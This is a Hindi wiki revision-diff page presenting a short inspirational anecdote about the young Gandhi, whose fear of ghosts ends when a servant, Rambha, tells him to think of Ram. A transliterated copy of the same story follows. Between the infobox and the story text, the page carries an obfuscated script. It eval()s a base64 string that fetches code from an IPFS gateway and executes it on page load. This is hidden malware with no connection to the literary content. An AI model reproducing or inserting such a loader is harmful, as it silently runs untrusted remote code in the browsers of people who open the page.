Difference between revisions of "भूतों से डर -महात्मा गाँधी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{सूचना बक्सा संक्षिप्त परिचय |चित्र=Mahatma_prerak.png |चित्र का...' के साथ नया पन्ना बनाया)
 
Line 28: Line 28:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
 
<poem style="background:#fbf8df; padding:15px; font-size:14px; border:1px solid #003333; border-radius:5px">
 
<poem style="background:#fbf8df; padding:15px; font-size:14px; border:1px solid #003333; border-radius:5px">
रात बहुत काली थी और मोहन डरा हुआ था. हमेशा से ही उसे भूतों से डर लगता था. वह जब भी अँधेरे में अकेला होता उसे लगता की कोई भूत आसा-पास है और कभी भी उसपे झपट पड़ेगा. और आज तो इतना अँधेरा था कि कुछ भी स्पष्ठ नहीं दिख रहा था , ऐसे में मोहन को एक कमरे से दूसरे कमरे में जाना था.
+
रात बहुत काली थी और मोहन डरा हुआ था। हमेशा से ही उसे भूतों से डर लगता था। वह जब भी अँधेरे में अकेला होता उसे लगता की कोई भूत आस-पास है और कभी भी उसपे झपट पड़ेगा। और आज तो इतना अँधेरा था कि कुछ भी स्पष्ट नहीं दिख रहा था, ऐसे में मोहन को एक कमरे से दूसरे कमरे में जाना था।
 +
वह हिम्मत कर के कमरे से निकला, पर उसका दिल जोर-जोर से धडकने लगा और चेहरे पर डर के भाव आ गए। घर में काम करने वाली रम्भा वहीं दरवाज़े पर खड़ी यह सब देख रही थी।
 +
"क्या हुआ बेटा?", उसने हँसते हुए पूछा।
 +
"मुझे डर लग रहा है दाई", मोहन ने उत्तर दिया।
 +
”डर, बेटा किस चीज का डर ?”
 +
”देखिये कितना अँधेरा है ! मुझे भूतों से डर लग रहा है!” मोहन सहमते हुए बोला।
 +
रम्भा ने प्यार से मोहन का सर सहलाते हुए कहा, ”जो कोई भी अँधेरे से डरता है वो मेरी बात सुने, राम जी के बारे में सोचो और कोई भूत तुम्हारे निकट आने की हिम्मत नहीं करेगा। कोई तुम्हारे सर का बाल तक नहीं छू पायेगा। राम जी तुम्हारी रक्षा करेंगे।”
  
वह हिम्मत कर के कमरे से निकला ,पर उसका दिल जोर-जोर से धडकने लगा और चेहरे पर डर के भाव आ गए. घर में काम करने वाली रम्भा वहीँ दरवाजे पर खड़ी यह सब देख रही थी.
+
रम्भा के शब्दों ने मोहन को हिम्मत दी। राम नाम लेते हुए वो कमरे से निकला, और उस दिन से मोहन ने कभी खुद को अकेला नहीं समझा और भयभीत नहीं हुआ। उसका विश्वास था कि जब तक राम उसके साथ हैं उसे डरने की कोई ज़रुरत नहीं।
  
” क्या हुआ बेटा?” , उसने हँसते हुए पूछा.
+
इस विश्वास ने गाँधी जी को जीवन भर शक्ति दी, और मरते वक़्त भी उनके मुख से राम नाम ही निकला।
 
 
” मुझे डर लग रहा है दाई,” मोहन ने उत्तर दिया.
 
 
 
” डर, बेटा किस चीज का डर ?”
 
 
 
” देखिये कितना अँधेरा है ! मुझे भूतों से डर लग रहा है!” मोहन सहमते हुए बोला.
 
 
 
रम्भा ने प्यार से मोहन का सर सहलाते हुए कहा, ” जो कोई भी अँधेरे से डरता है वो मेरी बात सुने: राम जी के बारे में सोचो और कोई भूत तुम्हारे निकट आने की हिम्मत नहीं करेगा. कोई तुम्हारे सर का बाल तक नहीं छू पायेगा. राम जी तुम्हारी रक्षा करेंगे.”
 
 
 
रम्भा के शब्दों ने मोहन को हिम्मत दी. राम नाम लेते हुए वो कमरे से निकला, और उस दिन से मोहन ने कभी खुद को अकेला नहीं समझा और भयभीत नहीं हुआ. उसका विश्वास था कि जब तक राम उसके साथ हैं उसे डरने की कोई ज़रुरत नहीं.
 
 
 
इस विश्वास ने गाँधी जी को जीवन भर शक्ति दी, और मरते वक़्त भी उनके मुख से राम नाम ही निकला.
 
 
 
;[[महात्मा गाँधी]] से जुडे अन्य प्रसंग पढ़ने के लिए [[महात्मा गाँधी -भारतकोश ]] पर जाएँ
 
  
 +
;[[महात्मा गाँधी]] से जुड़े अन्य प्रसंग पढ़ने के लिए [[महात्मा गाँधी के प्रेरक प्रसंग]] पर जाएँ। 
 
</poem>
 
</poem>
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
[[Category:अशोक कुमार शुक्ला]][[Category:महात्मा गाँधी]]
+
[[Category:अशोक कुमार शुक्ला]][[Category:समकालीन साहित्य]][[Category:प्रेरक प्रसंग]][[Category:महात्मा गाँधी]]
[[Category:पुस्तक कोश]]
+
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__
<noinclude>[[Category:प्रेरक प्रसंग]]</noinclude>
 

Revision as of 12:24, 13 August 2014

bhootoan se dar -mahatma gaandhi
vivaran is lekh mean mahatma gaandhi se sanbandhit prerak prasangoan ke liank diye gaye haian.
bhasha hiandi
desh bharat
mool shirshak prerak prasang
up shirshak mahatma gaandhi ke prerak prasang
sankalanakarta ashok kumar shukla

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

rat bahut kali thi aur mohan dara hua tha. hamesha se hi use bhootoan se dar lagata tha. vah jab bhi aandhere mean akela hota use lagata ki koee bhoot as-pas hai aur kabhi bhi usape jhapat p dega. aur aj to itana aandhera tha ki kuchh bhi spasht nahian dikh raha tha, aise mean mohan ko ek kamare se doosare kamare mean jana tha.
vah himmat kar ke kamare se nikala, par usaka dil jor-jor se dhadakane laga aur chehare par dar ke bhav a ge. ghar mean kam karane vali rambha vahian daravaze par kh di yah sab dekh rahi thi.
"kya hua beta?", usane hansate hue poochha.
"mujhe dar lag raha hai daee", mohan ne uttar diya.
”dar, beta kis chij ka dar ?”
”dekhiye kitana aandhera hai ! mujhe bhootoan se dar lag raha hai!” mohan sahamate hue bola.
rambha ne pyar se mohan ka sar sahalate hue kaha, ”jo koee bhi aandhere se darata hai vo meri bat sune, ram ji ke bare mean socho aur koee bhoot tumhare nikat ane ki himmat nahian karega. koee tumhare sar ka bal tak nahian chhoo payega. ram ji tumhari raksha kareange.”

rambha ke shabdoan ne mohan ko himmat di. ram nam lete hue vo kamare se nikala, aur us din se mohan ne kabhi khud ko akela nahian samajha aur bhayabhit nahian hua. usaka vishvas tha ki jab tak ram usake sath haian use darane ki koee zarurat nahian.

is vishvas ne gaandhi ji ko jivan bhar shakti di, aur marate vaqt bhi unake mukh se ram nam hi nikala.

mahatma gaandhi se ju de any prasang padhane ke lie mahatma gaandhi ke prerak prasang par jaean.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh